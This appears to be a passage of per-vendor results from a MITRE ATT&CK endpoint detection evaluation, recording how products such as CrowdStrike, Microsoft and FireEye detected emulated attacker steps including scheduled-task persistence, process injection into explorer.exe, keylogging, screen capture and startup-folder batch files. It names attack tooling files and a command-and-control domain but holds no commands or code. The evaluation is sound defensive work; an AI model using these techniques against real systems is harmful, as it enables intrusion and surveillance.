Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
FireEye
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in), which displays local account information. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in), which displays local account information. [1] [2] [3] [4] [5] [6] [7] [8] [9]
GoSecure
Telemetry (Tainted)
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. The telemetry was tainted by the parent "LSA Registry Key modified" alert. [1] [2] [3] [4] [5]
McAfee
Telemetry
Telemetry showed mmc.exe, the Microsoft Management Console, executing the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Microsoft
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Enrichment
The capability enriched mmc.exe, the Microsoft Management Console, executing the GUI-based lusrmgr.msc (Local Users and Groups snap-in) as reconnaissance via the MMC utility with local users and groups view. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry showed mmc.exe, the Microsoft Management Console, executing the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8]
Carbon Black
Telemetry
Telemetry showed file modification events indicating updater.dll being created and written to disk. [1] [2] [3] [4]
CrowdStrike
Telemetry (Tainted)
Telemetry showed the file write for updater.dll into the system32 folder by user George. The telemetry was tainted by the parent \"unexpected process\" alert. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry (Tainted)
Telemetry showed the creation of updater.dll. Telemetry was tainted by a parent alert on cmd.exe (listed as the owner process) generated based on updater.dll being detected as known malware. [1] [2] [3] [4] [5] [6] [7]
Endgame
Telemetry (Tainted)
Telemetry showed the creation of updater.dll (tainted by the parent Malicious File Detection). [1] [2] [3] [4]
FireEye
Enrichment
The capability enriched updater.dll being written by cmd.exe with an alert for CMD File Write (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and a related ATT&CK Technique (T1059 - Command-Line Interface) and Tactic (Execution). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed the file write for updater.dll into the system32 folder. The telemetry was tainted by the parent AV signature alert for updater.dll. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
F-Secure
Enrichment
The capability enriched the creation of updater.dll identifying that a command prompt modified an unknown DLL. [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed creation of updater.dll. The telemetry was tainted by the parent "Powershell process created" alert. [1] [2] [3] [4] [5] [6]
McAfee
Specific Behavior
A Specific Behavior alert was generated for a new dynamic library created in the Windows system (System32) folder. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior
A Specific Behavior alert was generated for a new PE file created in the Windows system (System32) folder. [1] [2] [3] [4] [5] [6] [7] [8]
Microsoft
Telemetry
Telemetry showed cmd.exe writing updater.dll to disk. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Palo Alto Networks
Specific Behavior
A Specific Behavior alert was generated for a Windows scripting engine creating an executable on disk. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a script engine creating/writing a DLL in the system32 folder. The alert was tainted by a parent process injection alert on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry
Telemetry showed the file create event for updater.dll. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
RSA
Telemetry
Telemetry showed file write of updater.dll. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed file write of updater.dll. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6]
Carbon Black
Specific Behavior
A Specific Behavior alert was generated mapped to the correct ATT&CK Technique (T1053 - Scheduled Task). [1] [2] [3] [4]
Telemetry
Telemetry showed the process tree containing schtasks.exe as well as the full command-line arguments. [1] [2] [3] [4]
CrowdStrike
Telemetry
Telemetry showed the creation of the scheduled task. [1] [2] [3] [4]
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating a Specific Behavior was observed because a scheduled task was created for persistence. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating the creation of the scheduled task was suspicious. The process tree view showed the alert as tainted by a previous cmd.exe detection. OverWatch is the managed threat hunting service. [1] [2] [3] [4]
Cybereason
Enrichment
The capability enriched schtasks.exe creating the Resume Viewer Update Checker scheduled task as reboot persistence and as SYSTEM. The data was also mapped to the correct ATT&CK Tactic (Persistence). [1] [2] [3] [4]
Telemetry
Telemetry showed the Resume Viewer Update Checker scheduled task. [1] [2] [3] [4]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched the event tree with the correct ATT&CK Technique (T1053 - Scheduled Task) and Tactic (Persistence) (tainted by parent Malicious File Detection alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
Enrichment
The capability enriched data from a hunt for persistence via scheduled task, which showed the \"Resume Viewer Update Checker\" scheduled task. [1] [2] [3] [4] [5]
Specific Behavior (Tainted)
A Specific Behavior alert for "Persistence-Scheduled Task Creation" was generated (tainted by parent Malicious File Detection alert).  The alert was also mapped to the correct ATT&CK Technique (T1053 - Scheduled Task) and Tactic (Persistence). [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showing creation of the scheduled task data was also visible in a event tree (tainted by parent Malicious File Detection alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that updater.dll persisted through the creation of a scheduled task. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched schtasks.exe with an alert for Scheduled Task Activity (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1053 - Scheduled Task) and Tactics (Execution, Persistence, and Privilege Escalation). [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed cmd.exe registering the "Resume Viewer Update Checker" scheduled task. [1] [2]
GoSecure
Specific Behavior
A Specific Behavior alert called "Schtasks with create command" was generated due to a schtasks.exe process create from cmd.exe. [1] [2]
Telemetry
Telemetry within the Schtasks alert showed a process creation of schtasks.exe from cmd.exe, and would be available in a separate view. For this alert, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe creating the "Resume Viewer Update Checker" scheduled task via schtasks.exe. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3]
Specific Behavior
A Specific Behavior alert was generated for a task being created that runs an executable (via rundll32) under system rights at Windows logon. The alert was tagged with the correct ATT&CK Tactics (Execution, Persistence, Privilege Escalation) and Technique (Scheduled Task). [1] [2] [3]
Microsoft
Specific Behavior (Delayed)
A delayed Specific Behavior alert was generated on a low-reputation DLL persisting through a scheduled task. [1] [2] [3]
Telemetry
Telemetry showed cmd.exe registering the "Resume Viewer Update Checker" scheduled task. [1] [2] [3]
Palo Alto Networks
Specific Behavior (Tainted)
A Specific Behavior alert was generated for the creation of a new scheduled task. The alert was tainted by a parent process injection alert on cmd.exe. Vendor stated the capability would have prevented the creation of the scheduled task. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched schtasks.exe creating the Resume Viewer Update Checker scheduled task with the correct ATT&CK Technique (Scheduled Task). [1] [2] [3] [4] [5] [6]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a commonly abused host process scheduling a task. The alert was tainted by a parent process injection alert on cmd.exe. Vendor stated the capability would have prevented the creation of the scheduled task. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed schtasks.exe creating the Resume Viewer Update Checker scheduled task as reboot persistence and as SYSTEM. The telemetry was tainted by a parent process injection alert on cmd.exe. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed the execution of schtasks.exe as well as the full command-line arguments. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of schtasks.exe and associated command-line arguments. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3]
Carbon Black
Telemetry
Telemetry showed cmd.exe executing dir with command-line arguments. [1] [2] [3] [4]
Enrichment
The capability enriched cmd.exe with the correct ATT&CK Technique (T1083 - File and Directory Discovery). [1] [2] [3] [4]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe running dir. The process tree view showed the cmd.exe process that ran dir as tainted by a prior detection. [1] [2] [3] [4] [5] [6]
Cybereason
Enrichment (Tainted)
The capability enriched cmd.exe executing dir with command-line arguments with the correct ATT&CK Tactic (Discovery) and Technique (File and Directory Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2]
Telemetry
Telemetry showed cmd.exe executing dir with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched dir with the correct ATT&CK Technique (T1083 - File and Directory Discovery) and Tactic (Discovery). The enrichment was also tainted by a parent Malicious File Detection. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry within an event tree (tainted by a parent Malicious File Detection) showed cmd.exe executing dir with command-line arguments. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4]
FireEye
Enrichment
The capability enriched cmd.exe executing dir with an alert for Dir Command (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1083 - File and Directory Discovery) and Tactic (Discovery). [1] [2] [3] [4]
F-Secure
Enrichment
The capability enriched cmd.exe executing the dir command indicating that the parameter was a directory listing of a network drive associated with potential reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running dir) has been tagged for monitoring because its parent process has a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing dir) which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
Telemetry (Tainted)
Telemetry showed that svchost.exe created cmd.exe, which executed dir. The telemetry was tainted by the parent \"Powershell process created\" alert. [1] [2]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing the dir command. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4]
Enrichment
The capability enriched cmd.exe executing the dir command with the correct ATT&CK Tactic (Discovery) and Technique (File and Directory Discovery). [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for cmd.exe executing dir with command-line arguments. The telemetry was tainted by a prior alert on rundll32.exe being executed without command-line arguments. [1] [2] [3] [4] [5]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed cmd.exe executing dir with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment (Tainted)
The capability enriched cmd.exe executing dir with command-line arguments as the execution of the dir command on a network location. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
A General Behavior alert was generated for a commonly abused process (cmd.exe) spawning out of rundll32.exe. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
Telemetry
Telemetry showed cmd.exe executing dir with command-line arguments. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing dir with command-line arguments. The telemetry was tainted by the activity seen during the initial compromise step because it was associated with the same story (Group ID). [1] [2]
Carbon Black
Telemetry
Telemetry showed cmd.exe executing tree.com with command-line arguments. [1] [2] [3] [4]
Enrichment
The capability enriched tree.com with the correct ATT&CK Technique (T1083 - File and Directory Discovery). [1] [2] [3] [4]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe running tree with command-line arguments. The process tree view also showed the cmd.exe that was the parent for tree.com as tainted by a prior detection. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating tree.com was suspicious. The process tree view showed the alert as tainted by a previous cmd.exe detection. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was identified because tree was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6]
Cybereason
Telemetry
Telemetry showed cmd.exe executing tree with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2]
Enrichment (Tainted)
The capability enriched cmd.exe executing tree with command-line arguments with the correct ATT&CK Tactic (Discovery) and Technique (File and Directory Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched tree with the correct ATT&CK Technique (T1083 - File and Directory Discovery) and Tactic (Discovery). The enrichment was also tainted by a parent Malicious File Detection). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry within an event tree (tainted by a parent Malicious File Detection) showed cmd.exe executing tree with command-line arguments. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4]
FireEye
Enrichment
The capability enriched cmd.exe executing tree with an alert for Tree Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1083 - File and Directory Discovery) and Tactic (Discovery). [1] [2] [3] [4]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker performed a directory listing of the contents of Debbie's user profile directory. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running tree) has been tagged for monitoring because its parent process has a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing tree) which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Enrichment
The capability enriched cmd.exe executing the tree command with a tag identifying the command as enumeration. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
Telemetry (Tainted)
Telemetry showed that svchost.exe created cmd.exe, which executed tree with command-line arguments. The telemetry was tainted by the parent \"Powershell process created\" alert. [1] [2]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing tree.exe. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4]
Enrichment
The capability enriched cmd.exe executing the tree.exe with the correct ATT&CK Tactic (Discovery) and Technique (File and Directory Discovery). [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for cmd.exe executing tree.com with command-line arguments. The telemetry was tainted by a prior alert on rundll32.exe being executed without command-line arguments. [1] [2] [3] [4] [5]
Palo Alto Networks
Enrichment
The capability enriched cmd.exe executing tree with command-line arguments with the correct ATT&CK Technique (File and Directory Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry (Tainted)
Telemetry showed cmd.exe executing tree with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
Telemetry
Telemetry showed cmd.exe executing tree with command-line arguments. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing tree with command-line arguments. The telemetry was tainted by the activity seen during the initial compromise step because it was associated with the same story (Group ID). [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Endgame
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
F-Secure
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
GoSecure
None
No detection capability demonstrated for this procedure. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Microsoft
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched the execution of a specific API call as process enumeration and suspicious activity. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3]
Carbon Black
None
No detection capability demonstrated for this procedure. The vendor indicated that CB Defense sees applicable API calls, but that product was not included in the evaluation. [1] [2]
CrowdStrike
None
No detection capability demonstrated for this procedure, though telemetry showed explorer.exe injecting from a known beacon (does not detect input capture specifically). [1] [2] [3] [4]
Cybereason
None
No detection capability was available, though an alert was generated based on a chain of injections caused by process injection of powershell.exe to cmd.exe then explorer.exe. Data within the alert showed the loaded keyloggerx64.dll module, and additional data showed the memory address and size of the module within explorer.exe. [1] [2] [3] [4] [5] [6]
Endgame
None
No detection capability demonstrated for this procedure, though strings were pulled from a Process Injection alert, which identified functionality of code to indicate keylogging, but no proof of execution was identified. [1] [2] [3]
FireEye
None
No detection capability demonstrated for this procedure. [1]
F-Secure
None
No detection capability demonstrated for this procedure. [1] [2]
GoSecure
None
No detection capability demonstrated for this procedure, though telemetry showed a remote thread being created from cmd.exe in explorer.exe. The vendor noted that if a user determined the process creation was suspicious, the user could manually kick off a DDNA scan from the Command-Line Interface (CLI) view by using the Process ID (PID). [1] [2] [3]
McAfee
None
No detection capability demonstrated for this procedure, though an alert indicated cmd.exe obtained a handle to the memory thread and injected code into explorer.exe. [1]
Microsoft
Specific Behavior (Delayed)
A delayed Specific Behavior alert was generated on "Possible keylogging activity" against explorer.exe. [1] [2] [3] [4] [5] [6] [7]
Telemetry (Configuration Change)
Telemetry showed events indicating "explorer.exe is reading user keystrokes." The vendor stated that Input Capture telemetry is captured but it was not immediately visible in the user portal. The vendor made changes to the portal during the test to enable the visibility of these events. Telemetry also showed cmd.exe injecting into explorer.exe to facilitate the keylogging, but this did not identify input capture specifically so was not counted as a detection. [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Enrichment
The capability enriched the execution of a specific API call as keylogging and suspicious activity. Though it does not count as a detection, the capability also showed code and hook injections into explorer.exe. [1] [2] [3] [4] [5]
RSA
None
No detection capability demonstrated for this procedure, though a floating code "IIOC" module alerted with a elevated risk score for DLL injection. An analyst could explore the module and observe the keylogger aggressor script, but this only showed that there is a potential capability of a keylogger, not that execution occurred. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed GetAsyncKeyStateApi, which was indicative of keylogging. The telemetry was tainted by the activity seen during the initial compromise step because it was associated with the same story (Group ID). Vendor stated log files indicate the powershell process was using the SSL cache folder. [1] [2] [3]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure. [1]
Cybereason
None
No detection capability demonstrated for this procedure.
Endgame
None
No detection capability demonstrated for this procedure.
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
None
No detection capability demonstrated for this procedure. [1]
GoSecure
None
No detection capability demonstrated for this procedure.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
None
No detection capability demonstrated for this procedure. [1] [2]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
None
No detection capability demonstrated for this procedure, though modloads showed the thumbnail com object masquerading followed by a modload of dwmapi.dll (Microsoft Desktop Windows Manager API) and then a crossprocess (open process) to the target application, which could be indicative of screen capture behavior. [1]
CrowdStrike
None
No detection capability demonstrated for this procedure, though telemetry showed explorer.exe injecting from a known beacon (does not detect screen capture specifically). [1]
Cybereason
None
No detection capability was available, though an alert was generated based on explorer.exe being flagged for loading a Meterpreter Agent. Data within a previous process injection alert showed the loaded screenshotx64.dll module. [1] [2]
Endgame
None
No detection capability demonstrated for this procedure, though strings were pulled from a Process Injection alert, which identified functionality of code to indicate screen capture, but no proof of execution was identified. [1]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
None
No detection capability demonstrated for this procedure.
GoSecure
None
No detection capability demonstrated for this procedure, though telemetry showed a remote thread being created from cmd.exe into explorer.exe. The vendor also noted that if a user determined the process creation was suspicious, the user could manually kick off a DDNA scan. DDNA results on this process reported "This module may capture screen shots," indicating the module has the capability to perform this. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
Enrichment (Configuration Change)
The capability enriched an explorer.exe process with ScreenshotTaken. The vendor stated that screen capture telemetry is captured but it was not immediately visible in the portal. The vendor made changes to the portal during the test to enable by default the visibility of these events, so this detection is identified as a configuration change. [1]
Palo Alto Networks
Enrichment
The capability enriched the execution of a specific API call as information gathering using screen capture and suspicious activity. [1]
RSA
None
No detection capability demonstrated for this procedure, though a floating code "IIOC" module alerted with a elevated risk score for DLL injection. An analyst could explore the module and observe multiple components related to jpegs, which may be related to screenshots, but does not show that execution occurred. [1]
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
Telemetry
Telemetry showed a cross-process "open handle" event into explorer.exe, which could be indicative of process injection. [1] [2] [3] [4] [5] [6] [7] [8]
CrowdStrike
Telemetry
Telemetry showed InjectedThread events for explorer.exe (pid=21776848613) injecting from cmd.exe (pid=21898821890), which is a known beacon. [1] [2] [3] [4] [5]
Cybereason
Specific Behavior
A Specific Behavior alert was generated based on a malicious code injection caused by process injection of explorer.exe. The alert was mapped with the correct ATT&CK Tactics (Defense Evasion, Privilege Escalation) and Technique (Process Injection) and indicated that explorer.exe was hosting injected threads and loading malicious files. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Specific Behavior (Tainted)
A Specific Behavior alert for process injection was generated with cmd.exe as the source. The alert was tainted by parent Malicious File Detection and process injection alerts, and was also labeled with the correct ATT&CK Technique (T1055 - Process Injection) and Tactics (Defense Evasion and Execution). [1] [2] [3] [4] [5]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2]
F-Secure
None
No detection capability demonstrated for this procedure. [1] [2]
GoSecure
Telemetry
Telemetry showed a remote thread being created from cmd.exe into explorer.exe, which could be indicative of process injection. [1] [2] [3] [4] [5] [6] [7] [8]
McAfee
Specific Behavior (Tainted)
A Specific Behavior alert was generated for code injection into explorer.exe. The alert was tagged with the correct ATT&CK Tactics (Defense Evasion, Privilege Escalation) and Technique (Process Injection) and was tainted by a trace detection on cmd.exe. [1] [2] [3]
Microsoft
Enrichment
The capability enriched the execution sequence for cmd.exe injecting into explorer.exe with the label \"Inject to process.\" [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Palo Alto Networks
Enrichment
The capability enriched cmd.exe injecting into explorer.exe as code injection via CreateThread. [1] [2] [3] [4]
RSA
None
No detection capability demonstrated for this procedure, though a floating code "IIOC" module alerted with a elevated risk score for DLL injection. There was no telemetry available for the processes that were injected to verify its relation this procedure. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed the sequence of events related to process injection from powershell.exe into explorer.exe. The capability associated the process with the highest threat to the event (powershell.exe) instead of cmd.exe (the expected source of the injection) because it had an alert associated with it previously. The telemetry was tainted by the activity seen during the initial compromise step because it was associated with the same story (Group ID). [1] [2] [3]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2]
Endgame
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
F-Secure
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
None
No detection capability demonstrated for this procedure. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Microsoft
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Palo Alto Networks
None
No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure.
Cybereason
None
No detection capability demonstrated for this procedure, though telemetry showed connection between Nimda (10.0.1.6) and the source of the file, Conficker (10.0.0.5), over port 445. [1]
Endgame
None
No detection capability demonstrated for this procedure, though file creation telemetry showed that the .vsdx file was created (no indication it was created from a shared drive). [1]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
None
No detection capability demonstrated for this procedure. [1]
GoSecure
None
No detection capability demonstrated for this procedure. [1]
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure. The vendor stated that by default WDATP monitored activities around all the most used documents (doc, xls, ppt pdf, etc) at the time of the evaluation. Subsequently, the vendor made changes to enable the visibility of .vsdx events by default, which is now available in WDATP. [1]
Palo Alto Networks
Telemetry
Telemetry showed a file read event for the .vsdx file from the network shared drive. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1] [2] [3]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
Telemetry
Telemetry showed remote file access behavior for the .vsdx file from the network shared drive. [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure.
Cybereason
None
No detection capability demonstrated for this procedure, though telemetry showed connection between Nimda (10.0.1.6) and the source of the file, Conficker (10.0.0.5), over port 445. [1]
Endgame
None
No detection capability demonstrated for this procedure.
FireEye
None
No detection capability demonstrated for this procedure, though DNS requests for freegoogleadsenseinfo.com (C2 domain) were observed. [1]
F-Secure
None
No detection capability demonstrated for this procedure.
GoSecure
None
No detection capability demonstrated for this procedure.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
None
No detection capability demonstrated for this procedure, though port 53 network traffic to/from freegoogleadsenseinfo.com (C2 domain) was observed. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
Telemetry
Telemetry within the process tree showed cmd.exe executing autoupdate.bat from the Startup folder. [1] [2] [3]
CrowdStrike
Telemetry
Telemetry showed cmd.exe running autoupdate.bat from the Startup folder. [1] [2]
Cybereason
Telemetry (Tainted)
Telemetry showed rundll32.exe executing autoupdate.bat from the Startup folder. The telemetry was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4]
Endgame
Telemetry (Tainted)
Telemetry showed the process chain for rundll32.exe execution of update.dat. The telemetry was tainted by the parent alert for \"RunDLL32 with Suspicious DLL Location.\" [1] [2] [3]
FireEye
Telemetry
Telemetry showed cmd.exe executing autoupdate.bat from the Startup folder. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that autoupdate.bat persisted due to its presence in the startup directory. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry (Tainted)
Telemetry showed rundll32.exe executing update.dll with command-line arguments. The telemetry was tainted by the parent alert for Rundll32 Execution (Weak Signal). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched cmd.exe executing a file from Startup with an alert for Process Execution Startup. The alert was also tagged with the correct ATT&CK Technique (T1060 - Registry Run Keys / Startup Folder) and Tactic (Persistence). [1] [2] [3] [4] [5] [6] [7] [8] [9]
F-Secure
Specific Behavior
A Specific Behavior alert was generated for a batch file automatically being started from the Startup folder. [1] [2] [3]
Telemetry
Telemetry showed cmd.exe executing autoupdate.bat from the Startup folder. [1] [2] [3]
GoSecure
